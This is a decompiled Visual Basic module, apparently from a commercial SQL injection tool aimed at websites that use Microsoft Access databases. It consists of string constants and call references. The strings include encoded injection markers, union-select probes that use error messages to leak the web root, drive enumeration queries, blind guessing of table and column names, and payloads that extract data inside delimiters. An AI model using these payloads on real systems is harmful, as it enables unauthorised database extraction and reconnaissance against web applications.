Attribute VB_Name = "MsAccess"
' This code module rebuilt by VBRezQ v3.3a.  2-Feb-2012 / 19:56:20
Option Explicit 
 
'Sub Subr_643()
'N  * ref: __vbaExceptHandler
'N  * ref: Subr_185
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: " "
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: Subr_185
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: __vbaVarCat
'N  * ref: " "
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'End Sub
 
'Sub Subr_644()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCat
'N  * ref: " where "
'N  * ref: __vbaStrMove
'N  * ref: "x"
'N  * ref: "="
'N  * ref: "x"
'N  * ref: IIf(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'End Sub
 
'Sub Subr_645()
'N  * ref: __vbaExceptHandler
'N  * ref: "Finding String Mark!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: "'"
'N  * ref: __vbaStrCopy
'N  * ref: __vbaVarCat
'N  * ref: "Finding String Mark:"
'N  * ref: __vbaStrCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCopy
'N  * ref: Subr_643
'N  * ref: Subr_184
'N  * ref: "x"
'N  * ref: " "
'N  * ref: "="
'N  * ref: Subr_151
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaInStr
'N  * ref: __vbaStrCopy
'N  * ref: "'"
'N  * ref: __vbaStrCmp
'N  * ref: """"
'N  * ref: __vbaStrCopy
'N  * ref: """"
'N  * ref: __vbaStrCmp
'N  * ref: __vbaI2Var
'N  * ref: "String Mark is"
'N  * ref: __vbaStrCat
'N  * ref: Subr_143
'N  * ref: "'"
'N  * ref: __vbaStrCopy
'N  * ref: "Cant find string mark"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_646()
'N  * ref: __vbaExceptHandler
'N  * ref: "Finding columns count(MsAccess)"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForInit
'N  * ref: __vbaVarCat
'N  * ref: "Finding columns count(MsAccess): "
'N  * ref: Subr_143
'N  * ref: __vbaStrCopy
'N  * ref: Subr_643
'N  * ref: "null"
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCopy
'N  * ref: Subr_153
'N  * ref: " from ["
'N  * ref: "]"
'N  * ref: Subr_644
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaInStr
'N  * ref: __vbaVarForNext
'N  * ref: Subr_643
'N  * ref: "null"
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCopy
'N  * ref: Subr_153
'N  * ref: " from ["
'N  * ref: "]"
'N  * ref: Subr_644
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStr
'N  * ref: __vbaI2Var
'N  * ref: "Selected Column Count is "
'N  * ref: Subr_143
'N  * ref: "Cannot find column count!"
'N  * ref: "Finding string column"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: "999999.9"
'N  * ref: __vbaLenBstr
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarForInit
'N  * ref: "chr(114)%2bchr(51)%2bchr(100)%2bchr(109)%2bchr(48)%2bchr(118)%2bchr(51)%2bchr(95)%2bchr(115)%2bchr(113)%2bchr(108)%2bchr(95)%2bchr(105)%2bchr(110)%2bchr(106)%2bchr(101)%2bchr(99)%2bchr(116)%2bchr(105)%2bchr(111)%2bchr(110)"
'N  * ref: __vbaStrCopy
'N  * ref: "Finding string column: "
'N  * ref: Subr_143
'N  * ref: Subr_156
'N  * ref: __vbaVarMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStr
'N  * ref: "r3dm0v3_sql_injection"
'N  * ref: __vbaInStr
'N  * ref: __vbaVarForNext
'N  * ref: __vbaI2Var
'N  * ref: "%String_Col%"
'N  * ref: __vbaVarDup
'N  * ref: Subr_156
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: "Valid String Column is "
'N  * ref: Subr_143
'N  * ref: "Cannot find string column!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCat
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: Subr_643
'N  * ref: Subr_184
'N  * ref: " %True_Expression%"
'N  * ref: Subr_644
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: "Injection type is blind!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaStrMove
'N  * ref: Subr_148
'N  * ref: __vbaUI1I2
'N  * ref: "Injection Syntax: "
'N  * ref: __vbaStrCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaErrorOverflow
'End Sub
 
'Sub Subr_647()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaStrCopy
'N  * ref: Subr_643
'N  * ref: __vbaVarCat
'N  * ref: "union select 1 from r3dm0v3fake.faketable%00"
'N  * ref: Subr_151
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: "*Could not find file '(*)r3dm0v3fake.mdb'.*"
'N  * ref: Subr_140
'N  * ref: Subr_183
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarTstNe
'N  * ref: "Web Root: "
'N  * ref: Subr_143
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaStrCat
'N  * ref: "Web Root: "
'N  * ref: __vbaStrMove
'N  * ref: vbTab
'N  * ref: vbCrLf
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: "Finding Drives"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarMove
'N  * ref: "z"
'N  * ref: Asc(
'N  * ref: "a"
'N  * ref: Asc(
'N  * ref: __vbaVarForInit
'N  * ref: __vbaVarTstGe
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: "Looking for Drive "
'N  * ref: ":"
'N  * ref: Subr_143
'N  * ref: __vbaStrCopy
'N  * ref: Subr_643
'N  * ref: Subr_184
'N  * ref: " 0=(select count(*) from "
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: ":\.a)%00"
'N  * ref: Subr_151
'N  * ref: __vbaFreeStr
'N  * ref: "Disk or network error."
'N  * ref: __vbaInStr
'N  * ref: "Could not find file"
'N  * ref: __vbaInStr
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: __vbaVarDup
'N  * ref: ":"
'N  * ref: " (Drive error! maybe it's CD-ROM)"
'N  * ref: "Disk or network error."
'N  * ref: __vbaInStr
'N  * ref: IIf(
'N  * ref: __vbaVarMove
'N  * ref: "Drive Found: "
'N  * ref: Subr_143
'N  * ref: __vbaVarAdd
'N  * ref: __vbaI4Var
'N  * ref: Chr(
'N  * ref: "Looking for Drive "
'N  * ref: ":"
'N  * ref: Subr_143
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaNew2
'N  * ref: __vbaHresultCheckObj
'N  * ref: vbTab
'N  * ref: __vbaVarDup
'N  * ref: "Drive: "
'N  * ref: vbTab
'N  * ref: __vbaStrCat
'N  * ref: __vbaVarCmpEq
'N  * ref: __vbaVarMove
'N  * ref: IIf(
'N  * ref: vbTab
'N  * ref: vbCrLf
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarForNext
'N  * ref: "Total drives found: "
'N  * ref: Subr_143
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_648()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaChkstk
'N  * ref: __vbaOnError
'N  * ref: "Keyword is not effective, if you are sure the target is vulnerable, Try again with a manual keyword"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: FileLen(
'N  * ref: Space(
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFileOpen
'N  * ref: __vbaGet3
'N  * ref: __vbaFileClose
'N  * ref: vbCrLf
'N  * ref: __vbaVarDup
'N  * ref: Split(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaRefVarAry
'N  * ref: __vbaUbound
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarMove
'N  * ref: "Guessing tables"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForInit
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoadRefLock
'N  * ref: Trim(
'N  * ref: __vbaAryUnlock
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "Guessing table("
'N  * ref: "/"
'N  * ref: "): "
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: "%String_Col%"
'N  * ref: __vbaInStr
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "(select top 1 cstr(6333333336)%2bchr(53) from ["
'N  * ref: "])"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%String_Col%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: "63333333365"
'N  * ref: __vbaVarCopy
'N  * ref: "%True_Expression%"
'N  * ref: __vbaInStr
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "0<=(select count(*) from ["
'N  * ref: "])"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_643
'N  * ref: Subr_184
'N  * ref: __vbaStrMove
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "1=1"
'N  * ref: __vbaVarDup
'N  * ref: "x"
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: "="
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: "x"
'N  * ref: __vbaStrCat
'N  * ref: IIf(
'N  * ref: __vbaStrCopy
'N  * ref: " 0<=(select count(*) from ["
'N  * ref: "]) and "
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCopy
'N  * ref: __vbaInStrVar
'N  * ref: __vbaVarTstGt
'N  * ref: __vbaFreeVar
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "Table found: "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoadRefLock
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaAryUnlock
'N  * ref: __vbaCastObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeObj
'N  * ref: "Guessing tables"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForNext
'N  * ref: "Total tables found: "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaAryUnlock
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObj
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_649()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaChkstk
'N  * ref: __vbaOnError
'N  * ref: "Keyword is not effective, can not find columns!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: FileLen(
'N  * ref: Space(
'N  * ref: __vbaStrVarMove
'N  * ref: __vbaStrMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFileOpen
'N  * ref: __vbaGet3
'N  * ref: __vbaFileClose
'N  * ref: vbCrLf
'N  * ref: __vbaVarDup
'N  * ref: Split(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaRefVarAry
'N  * ref: __vbaUbound
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarMove
'N  * ref: "Guessing columns"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForInit
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoadRefLock
'N  * ref: Trim(
'N  * ref: __vbaAryUnlock
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "Guessing column("
'N  * ref: "/"
'N  * ref: "): "
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: "%String_Col%"
'N  * ref: __vbaInStr
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "(select cstr(count(["
'N  * ref: "]))%2bcstr(6333333336)%2bchr(53) from ["
'N  * ref: "])"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%String_Col%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: "63333333365"
'N  * ref: __vbaVarCopy
'N  * ref: "%True_Expression%"
'N  * ref: __vbaInStr
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "0<=(select count(["
'N  * ref: "]) from ["
'N  * ref: "])"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%True_Expression%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: Subr_643
'N  * ref: Subr_184
'N  * ref: __vbaStrMove
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "1=1"
'N  * ref: __vbaVarDup
'N  * ref: "x"
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: "="
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: "x"
'N  * ref: __vbaStrCat
'N  * ref: IIf(
'N  * ref: __vbaStrCopy
'N  * ref: " 0<=(select count(["
'N  * ref: "]) from ["
'N  * ref: "]) and "
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaChkstk
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarCopy
'N  * ref: __vbaInStrVar
'N  * ref: __vbaVarTstGt
'N  * ref: __vbaFreeVar
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: "Column found: "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarAdd
'N  * ref: __vbaVarMove
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaCastObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaChkstk
'N  * ref: __vbaVarIndexLoad
'N  * ref: __vbaStrVarVal
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVar
'N  * ref: __vbaNew2
'N  * ref: __vbaObjSet
'N  * ref: __vbaLateIdCallLd
'N  * ref: __vbaCastObjVar
'N  * ref: __vbaObjSet
'N  * ref: "."
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCat
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaObjSet
'N  * ref: __vbaHresultCheckObj
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: "Guessing columns"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarForNext
'N  * ref: "Total columns found: "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaAryUnlock
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeObjList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeObj
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_650()
'N  * ref: __vbaExceptHandler
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCat
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "Column Data"
'N  * ref: "select top 1 ["
'N  * ref: __vbaStrMove
'N  * ref: "] from (select top 1 * from (select top "
'N  * ref: __vbaStrI4
'N  * ref: " * from ["
'N  * ref: "]"
'N  * ref: " order by 1) t order by 1 desc)t"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: Subr_703
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCat
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "(select top 1 chr(126)%2bchr(39)%2bcstr(["
'N  * ref: __vbaStrMove
'N  * ref: "])%2bchr(39)%2bchr(126) from (select top 1 * from (select top "
'N  * ref: __vbaStrI4
'N  * ref: " * from ["
'N  * ref: "]"
'N  * ref: " order by 1) t order by 1 desc)t)"
'N  * ref: __vbaVarCat
'N  * ref: __vbaVarCat
'N  * ref: __vbaStrVarVal
'N  * ref: "%String_Col%"
'N  * ref: Replace(
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: "~'([\s\S]*?)'~"
'N  * ref: Subr_165
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: "~'(.*?)'~"
'N  * ref: "~'([\s\S]*?)'~"
'N  * ref: Subr_165
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaVarCopy
'N  * ref: Subr_188
'N  * ref: "Data Found: "
'N  * ref: "="
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_651()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaStrCmp
'N  * ref: Subr_646
'N  * ref: __vbaFreeVar
'N  * ref: __vbaStrCat
'N  * ref: "["
'N  * ref: __vbaStrMove
'N  * ref: "]"
'N  * ref: "*"
'N  * ref: IIf(
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: IIf(
'N  * ref: __vbaVarDup
'N  * ref: "Row Count"
'N  * ref: __vbaVarCat
'N  * ref: "select Count("
'N  * ref: ") from ["
'N  * ref: "]"
'N  * ref: Subr_703
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVarList
'N  * ref: IsNumeric(
'N  * ref: __vbaVarCopy
'N  * ref: __vbaVarDup
'N  * ref: __vbaStrCat
'N  * ref: " where "
'N  * ref: IIf(
'N  * ref: "(select chr(126)%2bchr(39)%2bcstr(Count(["
'N  * ref: __vbaStrMove
'N  * ref: "]))%2bchr(39)%2bchr(126) from ["
'N  * ref: "]"
'N  * ref: __vbaVarCat
'N  * ref: ")"
'N  * ref: __vbaStrVarVal
'N  * ref: "%String_Col%"
'N  * ref: Replace(
'N  * ref: __vbaStrMove
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: "~'(.*?)'~"
'N  * ref: Subr_165
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: __vbaStrVarVal
'N  * ref: Val(
'N  * ref: __vbaFpI4
'N  * ref: __vbaFreeStr
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "Count("
'N  * ref: __vbaStrMove
'N  * ref: ") of "
'N  * ref: __vbaStrMove
'N  * ref: " is "
'N  * ref: Subr_143
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaVarDup
'N  * ref: " where "
'N  * ref: __vbaStrCmp
'N  * ref: IIf(
'N  * ref: "Can not get Count("
'N  * ref: __vbaStrMove
'N  * ref: ") of "
'N  * ref: __vbaStrMove
'N  * ref: Subr_143
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeVar
'End Sub
 
'Sub Subr_652()
'N  * ref: __vbaExceptHandler
'N  * ref: __vbaStrCopy
'N  * ref: Trim(
'N  * ref: Left(
'N  * ref: LCase(
'N  * ref: "select"
'N  * ref: __vbaVarTstEq
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCmp
'N  * ref: "Please register to activate"
'N  * ref: __vbaVarCopy
'N  * ref: "First try to get some data and then retry for executing query"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: "Please register to activate!"
'N  * ref: __vbaVarDup
'N  * ref: Subr_143
'N  * ref: __vbaLenVar
'N  * ref: __vbaI4Var
'N  * ref: Mid(
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVar
'N  * ref: __vbaVarDup
'N  * ref: "Query Result"
'N  * ref: Subr_703
'N  * ref: __vbaVarMove
'N  * ref: __vbaFreeVarList
'N  * ref: "(chr(126)%2bchr(39)%2b("
'N  * ref: __vbaStrCat
'N  * ref: __vbaStrMove
'N  * ref: ")%2bchr(39)%2bchr(126))"
'N  * ref: __vbaStrCat
'N  * ref: "%String_Col%"
'N  * ref: Replace(
'N  * ref: __vbaStrCopy
'N  * ref: Subr_151
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVar
'N  * ref: "~'([\s\S]*?)'~"
'N  * ref: Subr_165
'N  * ref: __vbaVarMove
'N  * ref: __vbaVarTstNe
'N  * ref: "~'(.*?)'~"
'N  * ref: "~'([\s\S]*?)'~"
'N  * ref: Subr_165
'N  * ref: __vbaVarMove
'N  * ref: "Query result: "
'N  * ref: __vbaVarCat
'N  * ref: Subr_143
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaStrCat
'N  * ref: "Its not possible to execute queries like '"
'N  * ref: __vbaStrMove
'N  * ref: "' in Access"
'N  * ref: Subr_143
'N  * ref: __vbaFreeStr
'N  * ref: __vbaFreeVar
'N  * ref: __vbaFreeStrList
'N  * ref: __vbaFreeVarList
'N  * ref: __vbaFreeStr
'End Sub
 
